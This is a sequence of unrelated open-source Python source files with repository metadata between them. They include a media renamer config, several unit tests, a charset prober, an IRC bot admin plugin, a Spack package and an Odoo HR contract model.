move_to = os.path.join(from_folder, os.path.relpath(leftoverfile, folder))
try:
self.makeDir(os.path.dirname(move_to))
self.moveFile(leftoverfile, move_to, cleanup)
except Exception as e:
log.error('Failed moving left over file %s to %s: %s %s', (leftoverfile, move_to, e, traceback.format_exc()))
# As we probably tried to overwrite the nfo file, check if it exists and then remove the original
if os.path.isfile(move_to) and os.path.getsize(leftoverfile) == os.path.getsize(move_to):
if cleanup:
log.info('Deleting left over file %s instead...', leftoverfile)
os.unlink(leftoverfile)
else:
continue
files.remove(leftoverfile)
extr_files.append(move_to)
if cleanup:
# Remove all left over folders
log.debug('Removing old movie folder %s...', media_folder)
self.deleteEmptyFolder(media_folder)
media_folder = os.path.join(from_folder, os.path.relpath(media_folder, folder))
folder = from_folder
if extr_files:
files.extend(extr_files)
# Cleanup files and folder if media_folder was not provided
if not media_folder:
files = []
folder = None
return folder, media_folder, files, extr_files
rename_options = {
'pre': '<',
'post': '>',
'choices': {
'ext': 'Extention (mkv)',
'namethe': 'Moviename, The',
'thename': 'The Moviename',
'year': 'Year (2011)',
'first': 'First letter (M)',
'quality': 'Quality (720p)',
'quality_type': '(HD) or (SD)',
'3d': '3D',
'3d_type': '3D Type (Full SBS)',
'video': 'Video (x264)',
'audio': 'Audio (DTS)',
'group': 'Releasegroup name',
'source': 'Source media (Bluray)',
'resolution_width': 'resolution width (1280)',
'resolution_height': 'resolution height (720)',
'audio_channels': 'audio channels (7.1)',
'original': 'Original filename',
'original_folder': 'Original foldername',
'imdb_id': 'IMDB id (tt0123456)',
'cd': 'CD number (cd1)',
'cd_nr': 'Just the cd nr. (1)',
'mpaa': 'MPAA or other certification',
'mpaa_only': 'MPAA only certification (G|PG|PG-13|R|NC-17|Not Rated)',
'category': 'Category label',
},
}
config = [{
'name': 'renamer',
'order': 40,
'description': 'Move and rename your downloaded movies to your movie directory.',
'groups': [
{
'tab': 'renamer',
'name': 'renamer',
'label': 'Rename downloaded movies',
'wizard': True,
'options': [
{
'name': 'enabled',
'default': False,
'type': 'enabler',
},
{
'name': 'from',
'type': 'directory',
'description': 'Folder where CP searches for movies.',
},
{
'name': 'to',
'type': 'directory',
'description': 'Default folder where the movies are moved/copied/linked to.',
},
{
'name': 'folder_name',
'label': 'Folder naming',
'description': 'Name of the folder. Keep empty for no folder.',
'default': '<namethe> (<year>)',
'type': 'choice',
'options': rename_options
},
{
'name': 'file_name',
'label': 'File naming',
'description': 'Name of the file',
'default': '<thename><cd>.<ext>',
'type': 'choice',
'options': rename_options
},
{
'advanced': True,
'name': 'replace_doubles',
'type': 'bool',
'label': 'Clean Name',
'description': ('Attempt to clean up double separaters due to missing data for fields.','Sometimes this eliminates wanted white space (see <a href="https://github.com/RuudBurger/CouchPotatoServer/issues/2782">#2782</a>).'),
'default': True
},
{
'name': 'unrar',
'type': 'bool',
'description': 'Extract rar files if found.',
'default': False,
},
{
'advanced': True,
'name': 'unrar_path',
'description': 'Custom path to unrar bin',
},
{
'advanced': True,
'name': 'unrar_modify_date',
'type': 'bool',
'description': ('Set modify date of unrar-ed files to the rar-file\'s date.', 'This will allow XBMC to recognize extracted files as recently added even if the movie was released some time ago.'),
'default': False,
},
{
'name': 'cleanup',
'type': 'bool',
'description': 'Cleanup leftover files after successful rename.',
'default': False,
},
{
'advanced': True,
'name': 'run_every',
'label': 'Run every',
'default': 1,
'type': 'int',
'unit': 'min(s)',
'description': ('Detect movie status every X minutes.', 'Will start the renamer if movie is <strong>completed</strong> or handle <strong>failed</strong> download if these options are enabled'),
},
{
'advanced': True,
'name': 'force_every',
'label': 'Force every',
'default': 2,
'type': 'int',
'unit': 'hour(s)',
'description': 'Forces the renamer to scan every X hours',
},
{
'advanced': True,
'name': 'next_on_failed',
'default': True,
'type': 'bool',
'description': 'Try the next best release for a movie after a download failed.',
},
{
'name': 'move_leftover',
'type': 'bool',
'description': 'Move all leftover file after renaming, to the movie folder.',
'default': False,
'advanced': True,
},
{
'advanced': True,
'name': 'separator',
'label': 'File-Separator',
'description': ('Replace all the spaces with a character.', 'Example: ".", "-" (without quotes). Leave empty to use spaces.'),
},
{
'advanced': True,
'name': 'foldersep',
'label': 'Folder-Separator',
'description': ('Replace all the spaces with a character.', 'Example: ".", "-" (without quotes). Leave empty to use spaces.'),
},
{
'name': 'check_space',
'label': 'Check space',
'default': True,
'type': 'bool',
'description': ('Check if there\'s enough available space to rename the files', 'Disable when the filesystem doesn\'t return the proper value'),
'advanced': True,
},
{
'name': 'default_file_action',
'label': 'Default File Action',
'default': 'move',
'type': 'dropdown',
'values': [('Link', 'link'), ('Copy', 'copy'), ('Move', 'move')],
'description': ('<strong>Link</strong>, <strong>Copy</strong> or <strong>Move</strong> after download completed.',
'Link first tries <a href="http://en.wikipedia.org/wiki/Hard_link">hard link</a>, then <a href="http://en.wikipedia.org/wiki/Sym_link">sym link</a> and falls back to Copy.'),
'advanced': True,
},
{
'name': 'file_action',
'label': 'Torrent File Action',
'default': 'link',
'type': 'dropdown',
'values': [('Link', 'link'), ('Copy', 'copy'), ('Move', 'move')],
'description': 'See above. It is prefered to use link when downloading torrents as it will save you space, while still being able to seed.',
'advanced': True,
},
{
'advanced': True,
'name': 'ntfs_permission',
'label': 'NTFS Permission',
'type': 'bool',
'hidden': os.name != 'nt',
'description': 'Set permission of moved files to that of destination folder (Windows NTFS only).',
'default': False,
},
],
}, {
'tab': 'renamer',
'name': 'meta_renamer',
'label': 'Advanced renaming',
'description': 'Meta data file renaming. Use <filename> to use the above "File naming" settings, without the file extention.',
'advanced': True,
'options': [
{
'name': 'rename_nfo',
'label': 'Rename .NFO',
'description': 'Rename original .nfo file',
'type': 'bool',
'default': True,
},
{
'name': 'nfo_name',
'label': 'NFO naming',
'default': '<filename>.orig.<ext>',
'type': 'choice',
'options': rename_options
},
],
},
],
}]
|
gpl-3.0
|
mdeemer/XlsxWriter
|
xlsxwriter/test/comparison/test_rich_string10.py
|
8
|
1236
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'rich_string10.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
bold = workbook.add_format({'bold': 1})
italic = workbook.add_format({'italic': 1})
worksheet.write('A1', 'Foo', bold)
worksheet.write('A2', 'Bar', italic)
worksheet.write_rich_string('A3', ' a', bold, 'bc', 'defg ')
workbook.close()
self.assertExcelEqual()
|
bsd-2-clause
|
ArthurGarnier/SickRage
|
lib/chardet/sbcsgroupprober.py
|
273
|
3546
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetgroupprober import CharSetGroupProber
from .sbcharsetprober import SingleByteCharSetProber
from .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel,
Latin5CyrillicModel, MacCyrillicModel,
Ibm866Model, Ibm855Model)
from .langgreekmodel import Latin7GreekModel, Win1253GreekModel
from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel
# from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel
from .langthaimodel import TIS620ThaiModel
from .langhebrewmodel import Win1255HebrewModel
from .hebrewprober import HebrewProber
from .langturkishmodel import Latin5TurkishModel
class SBCSGroupProber(CharSetGroupProber):
def __init__(self):
super(SBCSGroupProber, self).__init__()
self.probers = [
SingleByteCharSetProber(Win1251CyrillicModel),
SingleByteCharSetProber(Koi8rModel),
SingleByteCharSetProber(Latin5CyrillicModel),
SingleByteCharSetProber(MacCyrillicModel),
SingleByteCharSetProber(Ibm866Model),
SingleByteCharSetProber(Ibm855Model),
SingleByteCharSetProber(Latin7GreekModel),
SingleByteCharSetProber(Win1253GreekModel),
SingleByteCharSetProber(Latin5BulgarianModel),
SingleByteCharSetProber(Win1251BulgarianModel),
# TODO: Restore Hungarian encodings (iso-8859-2 and windows-1250)
# after we retrain model.
# SingleByteCharSetProber(Latin2HungarianModel),
# SingleByteCharSetProber(Win1250HungarianModel),
SingleByteCharSetProber(TIS620ThaiModel),
SingleByteCharSetProber(Latin5TurkishModel),
]
hebrew_prober = HebrewProber()
logical_hebrew_prober = SingleByteCharSetProber(Win1255HebrewModel,
False, hebrew_prober)
visual_hebrew_prober = SingleByteCharSetProber(Win1255HebrewModel, True,
hebrew_prober)
hebrew_prober.set_model_probers(logical_hebrew_prober, visual_hebrew_prober)
self.probers.extend([hebrew_prober, logical_hebrew_prober,
visual_hebrew_prober])
self.reset()
|
gpl-3.0
|
ajaali/django
|
tests/bash_completion/tests.py
|
327
|
3888
|
"""
A series of tests to establish that the command-line bash completion works.
"""
import os
import sys
import unittest
from django.apps import apps
from django.core.management import ManagementUtility
from django.test.utils import captured_stdout
class BashCompletionTests(unittest.TestCase):
"""
Testing the Python level bash completion code.
This requires setting up the environment as if we got passed data
from bash.
"""
def setUp(self):
self.old_DJANGO_AUTO_COMPLETE = os.environ.get('DJANGO_AUTO_COMPLETE')
os.environ['DJANGO_AUTO_COMPLETE'] = '1'
def tearDown(self):
if self.old_DJANGO_AUTO_COMPLETE:
os.environ['DJANGO_AUTO_COMPLETE'] = self.old_DJANGO_AUTO_COMPLETE
else:
del os.environ['DJANGO_AUTO_COMPLETE']
def _user_input(self, input_str):
"""
Set the environment and the list of command line arguments.
This sets the bash variables $COMP_WORDS and $COMP_CWORD. The former is
an array consisting of the individual words in the current command
line, the latter is the index of the current cursor position, so in
case a word is completed and the cursor is placed after a whitespace,
$COMP_CWORD must be incremented by 1:
* 'django-admin start' -> COMP_CWORD=1
* 'django-admin startproject' -> COMP_CWORD=1
* 'django-admin startproject ' -> COMP_CWORD=2
"""
os.environ['COMP_WORDS'] = input_str
idx = len(input_str.split(' ')) - 1 # Index of the last word
comp_cword = idx + 1 if input_str.endswith(' ') else idx
os.environ['COMP_CWORD'] = str(comp_cword)
sys.argv = input_str.split()
def _run_autocomplete(self):
util = ManagementUtility(argv=sys.argv)
with captured_stdout() as stdout:
try:
util.autocomplete()
except SystemExit:
pass
return stdout.getvalue().strip().split('\n')
def test_django_admin_py(self):
"django_admin.py will autocomplete option flags"
self._user_input('django-admin sqlmigrate --verb')
output = self._run_autocomplete()
self.assertEqual(output, ['--verbosity='])
def test_manage_py(self):
"manage.py will autocomplete option flags"
self._user_input('manage.py sqlmigrate --verb')
output = self._run_autocomplete()
self.assertEqual(output, ['--verbosity='])
def test_custom_command(self):
"A custom command can autocomplete option flags"
self._user_input('django-admin test_command --l')
output = self._run_autocomplete()
self.assertEqual(output, ['--list'])
def test_subcommands(self):
"Subcommands can be autocompleted"
self._user_input('django-admin sql')
output = self._run_autocomplete()
self.assertEqual(output, ['sqlflush sqlmigrate sqlsequencereset'])
def test_completed_subcommand(self):
"Show option flags in case a subcommand is completed"
self._user_input('django-admin startproject ') # Trailing whitespace
output = self._run_autocomplete()
for item in output:
self.assertTrue(item.startswith('--'))
def test_help(self):
"No errors, just an empty list if there are no autocomplete options"
self._user_input('django-admin help --')
output = self._run_autocomplete()
self.assertEqual(output, [''])
def test_app_completion(self):
"Application names will be autocompleted for an AppCommand"
self._user_input('django-admin sqlmigrate a')
output = self._run_autocomplete()
a_labels = sorted(app_config.label
for app_config in apps.get_app_configs()
if app_config.label.startswith('a'))
self.assertEqual(output, a_labels)
|
bsd-3-clause
|
sajeeshcs/nested_quota_latest
|
nova/tests/unit/compute/test_hvtype.py
|
11
|
1617
|
# Copyright (C) 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.compute import hv_type
from nova import exception
from nova import test
class HvTypeTest(test.NoDBTestCase):
def test_valid_string(self):
self.assertTrue(hv_type.is_valid("vmware"))
def test_valid_constant(self):
self.assertTrue(hv_type.is_valid(hv_type.QEMU))
def test_valid_bogus(self):
self.assertFalse(hv_type.is_valid("acmehypervisor"))
def test_canonicalize_none(self):
self.assertIsNone(hv_type.canonicalize(None))
def test_canonicalize_case(self):
self.assertEqual(hv_type.QEMU, hv_type.canonicalize("QeMu"))
def test_canonicalize_xapi(self):
self.assertEqual(hv_type.XEN, hv_type.canonicalize("xapi"))
def test_canonicalize_powervm(self):
self.assertEqual(hv_type.PHYP, hv_type.canonicalize("POWERVM"))
def test_canonicalize_invalid(self):
self.assertRaises(exception.InvalidHypervisorVirtType,
hv_type.canonicalize,
"wibble")
|
apache-2.0
|
allanice001/RJ45
|
plugins/admin.py
|
1
|
6874
|
from util import hook
import os
import re
import json
import time
import subprocess
@hook.command(autohelp=False, permissions=["permissions_users"])
def permissions(inp, bot=None, notice=None):
"permissions [group] -- lists the users and their permission level who have permissions."
permissions = bot.config.get("permissions", [])
groups = []
if inp:
for k in permissions:
if inp == k:
groups.append(k)
else:
for k in permissions:
groups.append(k)
if not groups:
notice("%s is not a group with permissions" % inp)
return None
for v in groups:
members = ""
for value in permissions[v]["users"]:
members = members + value + ", "
if members:
notice("the members in the %s group are.." % v)
notice(members[:-2])
else:
notice("there are no members in the %s group" % v)
@hook.command(permissions=["permissions_users"])
def deluser(inp, bot=None, notice=None):
"deluser [user] [group] -- removes elevated permissions from [user]. " \
"If [group] is specified, they will only be removed from [group]."
permissions = bot.config.get("permissions", [])
inp = inp.split(" ")
groups = []
try:
specgroup = inp[1]
except IndexError:
specgroup = None
for k in permissions:
groups.append(k)
else:
for k in permissions:
if specgroup == k:
groups.append(k)
if not groups:
notice("%s is not a group with permissions" % inp[1])
return None
removed = 0
for v in groups:
users = permissions[v]["users"]
for value in users:
if inp[0] == value:
users.remove(inp[0])
removed = 1
notice("%s has been removed from the group %s" % (inp[0], v))
json.dump(bot.config, open('config', 'w'), sort_keys=True, indent=2)
if specgroup:
if removed == 0:
notice("%s is not in the group %s" % (inp[0], specgroup))
else:
if removed == 0:
notice("%s is not in any groups" % inp[0])
@hook.command(permissions=["permissions_users"])
def adduser(inp, bot=None, notice=None):
"adduser [user] [group] -- adds elevated permissions to [user]. " \
"[group] must be specified."
permissions = bot.config.get("permissions", [])
inp = inp.split(" ")
try:
user = inp[0]
targetgroup = inp[1]
except IndexError:
notice("the group must be specified")
return None
if not re.search('.+!.+@.+', user):
notice("the user must be in the form of \"nick!user@host\"")
return None
try:
users = permissions[targetgroup]["users"]
except KeyError:
notice("no such group as %s" % targetgroup)
return None
if user in users:
notice("%s is already in %s" % (user, targetgroup))
return None
users.append(user)
notice("%s has been added to the group %s" % (user, targetgroup))
users.sort()
json.dump(bot.config, open('config', 'w'), sort_keys=True, indent=2)
@hook.command("quit", autohelp=False, permissions=["botcontrol"])
@hook.command(autohelp=False, permissions=["botcontrol"])
def stop(inp, nick=None, conn=None):
"stop [reason] -- Kills the bot with [reason] as its quit message."
if inp:
conn.cmd("QUIT", ["Killed by %s (%s)" % (nick, inp)])
else:
conn.cmd("QUIT", ["Killed by %s." % nick])
time.sleep(5)
os.execl("./cloudbot", "cloudbot", "stop")
@hook.command(autohelp=False, permissions=["botcontrol"])
def restart(inp, nick=None, conn=None):
"restart [reason] -- Restarts the bot with [reason] as its quit message."
if inp:
conn.cmd("QUIT", ["Restarted by %s (%s)" % (nick, inp)])
else:
conn.cmd("QUIT", ["Restarted by %s." % nick])
time.sleep(5)
os.execl("./cloudbot", "cloudbot", "restart")
@hook.command(autohelp=False, permissions=["botcontrol"])
def clearlogs(inp, input=None):
"clearlogs -- Clears the bots log(s)."
subprocess.call(["./cloudbot", "clear"])
@hook.command(permissions=["botcontrol"])
def join(inp, conn=None, notice=None):
"join <channel> -- Joins <channel>."
notice("Attempting to join %s..." % inp)
conn.join(inp)
@hook.command(autohelp=False, permissions=["botcontrol"])
def part(inp, conn=None, chan=None, notice=None):
"part <channel> -- Leaves <channel>." \
"If [channel] is blank the bot will leave the " \
"channel the command was used in."
if inp:
target = inp
else:
target = chan
notice("Attempting to leave %s..." % target)
conn.part(target)
@hook.command(autohelp=False, permissions=["botcontrol"])
def cycle(inp, conn=None, chan=None, notice=None):
"cycle <channel> -- Cycles <channel>." \
"If [channel] is blank the bot will cycle the " \
"channel the command was used in."
if inp:
target = inp
else:
target = chan
notice("Attempting to cycle %s..." % target)
conn.part(target)
conn.join(target)
@hook.command(permissions=["botcontrol"])
def nick(inp, input=None, notice=None, conn=None):
"nick <nick> -- Changes the bots nickname to <nick>."
if not re.match("^[A-Za-z0-9_|.-\]\[]*$", inp.lower()):
notice("Invalid username!")
return
notice("Attempting to change nick to \"%s\"..." % inp)
conn.set_nick(inp)
@hook.command(permissions=["botcontrol"])
def raw(inp, conn=None, notice=None):
"raw <command> -- Sends a RAW IRC command."
notice("Raw command sent.")
conn.send(inp)
@hook.command(permissions=["botcontrol"])
def say(inp, conn=None, chan=None, notice=None):
"say [channel] <message> -- Makes the bot say <message> in [channel]. " \
"If [channel] is blank the bot will say the <message> in the channel " \
"the command was used in."
inp = inp.split(" ")
if inp[0][0] == "#":
message = ""
for x in inp[1:]:
message = message + x + " "
message = message[:-1]
out = "PRIVMSG %s :%s" % (inp[0], message)
else:
message = ""
for x in inp[0:]:
message = message + x + " "
message = message[:-1]
out = "PRIVMSG %s :%s" % (chan, message)
conn.send(out)
@hook.command("act", permissions=["botcontrol"])
@hook.command(permissions=["botcontrol"])
def me(inp, conn=None, chan=None, notice=None):
"me [channel] <action> -- Makes the bot act out <action> in [channel]. " \
"If [channel] is blank the bot will act the <action> in the channel the " \
"command was used in."
inp = inp.split(" ")
if inp[0][0] == "#":
message = ""
for x in inp[1:]:
message = message + x + " "
message = message[:-1]
out = "PRIVMSG %s :\x01ACTION %s\x01" % (inp[0], message)
else:
message = ""
for x in inp[0:]:
message = message + x + " "
message = message[:-1]
out = "PRIVMSG %s :\x01ACTION %s\x01" % (chan, message)
conn.send(out)
|
gpl-2.0
|
wscullin/spack
|
var/spack/repos/builtin/packages/xhost/package.py
|
3
|
1821
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Xhost(AutotoolsPackage):
"""xhost is used to manage the list of host names or user names
allowed to make connections to the X server."""
homepage = "http://cgit.freedesktop.org/xorg/app/xhost"
url = "https://www.x.org/archive/individual/app/xhost-1.0.7.tar.gz"
version('1.0.7', 'de34b4ba5194634dbeb29a1f008f495a')
depends_on('libx11')
depends_on('libxmu')
depends_on('libxau')
depends_on('[email protected]:', type='build')
depends_on('[email protected]:', type='build')
depends_on('util-macros', type='build')
|
lgpl-2.1
|
beni55/olympia
|
apps/reviews/tests/test_helpers.py
|
14
|
4658
|
from nose.tools import eq_
import jingo
from pyquery import PyQuery as pq
import amo.tests
from addons.models import Addon
from amo.urlresolvers import reverse
from reviews.models import ReviewFlag
from reviews.forms import ReviewForm
class HelpersTest(amo.tests.TestCase):
def render(self, s, context={}):
t = jingo.env.from_string(s)
return t.render(context)
def test_stars(self):
s = self.render('{{ num|stars }}', {'num': None})
eq_(s, 'Not yet rated')
doc = pq(self.render('{{ num|stars }}', {'num': 1}))
msg = 'Rated 1 out of 5 stars'
eq_(doc.attr('class'), 'stars stars-1')
eq_(doc.attr('title'), msg)
eq_(doc.text(), msg)
def test_stars_details_page(self):
doc = pq(self.render('{{ num|stars(large=True) }}', {'num': 2}))
eq_(doc('.stars').attr('class'), 'stars large stars-2')
def test_stars_max(self):
doc = pq(self.render('{{ num|stars }}', {'num': 5.3}))
eq_(doc.attr('class'), 'stars stars-5')
def test_reviews_link(self):
a = Addon(average_rating=4, total_reviews=37, id=1, type=1, slug='xx')
s = self.render('{{ reviews_link(myaddon) }}', {'myaddon': a})
eq_(pq(s)('strong').text(), '37 reviews')
# without collection uuid
eq_(pq(s)('a').attr('href'), '/en-US/firefox/addon/xx/#reviews')
# with collection uuid
myuuid = 'f19a8822-1ee3-4145-9440-0a3640201fe6'
s = self.render('{{ reviews_link(myaddon, myuuid) }}',
{'myaddon': a, 'myuuid': myuuid})
eq_(pq(s)('a').attr('href'),
'/en-US/firefox/addon/xx/?collection_uuid=%s#reviews' % myuuid)
z = Addon(average_rating=0, total_reviews=0, id=1, type=1, slug='xx')
s = self.render('{{ reviews_link(myaddon) }}', {'myaddon': z})
eq_(pq(s)('strong').text(), 'Not yet rated')
# with link
u = reverse('addons.reviews.list', args=['xx'])
s = self.render('{{ reviews_link(myaddon, link_to_list=True) }}',
{'myaddon': a})
eq_(pq(s)('a').attr('href'), u)
def test_impala_reviews_link(self):
a = Addon(average_rating=4, total_reviews=37, id=1, type=1, slug='xx')
s = self.render('{{ impala_reviews_link(myaddon) }}', {'myaddon': a})
eq_(pq(s)('a').text(), '(37)')
# without collection uuid
eq_(pq(s)('a').attr('href'), '/en-US/firefox/addon/xx/#reviews')
# with collection uuid
myuuid = 'f19a8822-1ee3-4145-9440-0a3640201fe6'
s = self.render('{{ impala_reviews_link(myaddon, myuuid) }}',
{'myaddon': a, 'myuuid': myuuid})
eq_(pq(s)('a').attr('href'),
'/en-US/firefox/addon/xx/?collection_uuid=%s#reviews' % myuuid)
z = Addon(average_rating=0, total_reviews=0, id=1, type=1, slug='xx')
s = self.render('{{ impala_reviews_link(myaddon) }}', {'myaddon': z})
eq_(pq(s)('b').text(), 'Not yet rated')
# with link
u = reverse('addons.reviews.list', args=['xx'])
s = self.render(
'{{ impala_reviews_link(myaddon, link_to_list=True) }}',
{'myaddon': a})
eq_(pq(s)('a').attr('href'), u)
def test_mobile_reviews_link(self):
def s(a):
return pq(self.render('{{ mobile_reviews_link(myaddon) }}',
{'myaddon': a}))
a = Addon(total_reviews=0, id=1, type=1, slug='xx')
doc = s(a)
eq_(doc('a').attr('href'), reverse('addons.reviews.add', args=['xx']))
u = reverse('addons.reviews.list', args=['xx'])
a = Addon(average_rating=4, total_reviews=37, id=1, type=1, slug='xx')
doc = s(a)
eq_(doc('a').attr('href'), u)
eq_(doc('a').text(), 'Rated 4 out of 5 stars See All 37 Reviews')
a = Addon(average_rating=4, total_reviews=1, id=1, type=1, slug='xx')
doc = s(a)
doc.remove('div')
eq_(doc('a').attr('href'), u)
eq_(doc('a').text(), 'See All Reviews')
def test_report_review_popup(self):
doc = pq(self.render('{{ report_review_popup() }}'))
eq_(doc('.popup.review-reason').length, 1)
for flag, text in ReviewFlag.FLAGS:
eq_(doc('li a[href$=%s]' % flag).text(), text)
eq_(doc('form input[name=note]').length, 1)
def test_edit_review_form(self):
doc = pq(self.render('{{ edit_review_form() }}'))
eq_(doc('#review-edit-form').length, 1)
eq_(doc('p.req').length, 1)
for name in ReviewForm().fields.keys():
eq_(doc('[name=%s]' % name).length, 1)
|
bsd-3-clause
|
mvaled/OpenUpgrade
|
addons/hr_contract/hr_contract.py
|
302
|
5377
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
class hr_employee(osv.osv):
_name = "hr.employee"
_description = "Employee"
_inherit = "hr.employee"
def _get_latest_contract(self, cr, uid, ids, field_name, args, context=None):
res = {}
obj_contract = self.pool.get('hr.contract')
for emp in self.browse(cr, uid, ids, context=context):
contract_ids = obj_contract.search(cr, uid, [('employee_id','=',emp.id),], order='date_start', context=context)
if contract_ids:
res[emp.id] = contract_ids[-1:][0]
else:
res[emp.id] = False
return res
def _contracts_count(self, cr, uid, ids, field_name, arg, context=None):
Contract = self.pool['hr.contract']
return {
employee_id: Contract.search_count(cr, SUPERUSER_ID, [('employee_id', '=', employee_id)], context=context)
for employee_id in ids
}
_columns = {
'manager': fields.boolean('Is a Manager'),
'medic_exam': fields.date('Medical Examination Date'),
'place_of_birth': fields.char('Place of Birth'),
'children': fields.integer('Number of Children'),
'vehicle': fields.char('Company Vehicle'),
'vehicle_distance': fields.integer('Home-Work Dist.', help="In kilometers"),
'contract_ids': fields.one2many('hr.contract', 'employee_id', 'Contracts'),
'contract_id': fields.function(_get_latest_contract, string='Contract', type='many2one', relation="hr.contract", help='Latest contract of the employee'),
'contracts_count': fields.function(_contracts_count, type='integer', string='Contracts'),
}
class hr_contract_type(osv.osv):
_name = 'hr.contract.type'
_description = 'Contract Type'
_columns = {
'name': fields.char('Contract Type', required=True),
}
class hr_contract(osv.osv):
_name = 'hr.contract'
_description = 'Contract'
_columns = {
'name': fields.char('Contract Reference', required=True),
'employee_id': fields.many2one('hr.employee', "Employee", required=True),
'department_id': fields.related('employee_id','department_id', type='many2one', relation='hr.department', string="Department", readonly=True),
'type_id': fields.many2one('hr.contract.type', "Contract Type", required=True),
'job_id': fields.many2one('hr.job', 'Job Title'),
'date_start': fields.date('Start Date', required=True),
'date_end': fields.date('End Date'),
'trial_date_start': fields.date('Trial Start Date'),
'trial_date_end': fields.date('Trial End Date'),
'working_hours': fields.many2one('resource.calendar','Working Schedule'),
'wage': fields.float('Wage', digits=(16,2), required=True, help="Basic Salary of the employee"),
'advantages': fields.text('Advantages'),
'notes': fields.text('Notes'),
'permit_no': fields.char('Work Permit No', required=False, readonly=False),
'visa_no': fields.char('Visa No', required=False, readonly=False),
'visa_expire': fields.date('Visa Expire Date'),
}
def _get_type(self, cr, uid, context=None):
type_ids = self.pool.get('hr.contract.type').search(cr, uid, [('name', '=', 'Employee')])
return type_ids and type_ids[0] or False
_defaults = {
'date_start': lambda *a: time.strftime("%Y-%m-%d"),
'type_id': _get_type
}
def onchange_employee_id(self, cr, uid, ids, employee_id, context=None):
if not employee_id:
return {'value': {'job_id': False}}
emp_obj = self.pool.get('hr.employee').browse(cr, uid, employee_id, context=context)
job_id = False
if emp_obj.job_id:
job_id = emp_obj.job_id.id
return {'value': {'job_id': job_id}}
def _check_dates(self, cr, uid, ids, context=None):
for contract in self.read(cr, uid, ids, ['date_start', 'date_end'], context=context):
if contract['date_start'] and contract['date_end'] and contract['date_start'] > contract['date_end']:
return False
return True
_constraints = [
(_check_dates, 'Error! Contract start-date must be less than contract end-date.', ['date_start', 'date_end'])
]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
donspaulding/adspygoogle
|
examples/adspygoogle/dfp/v201302/inventory_service/create_ad_units.py
|
3
|
2804
|
#!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example creates new ad units.
To determine which ad units exist, run get_all_ad_units.py
Tags: InventoryService.createAdUnits
"""
__author__ = '[email protected] (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
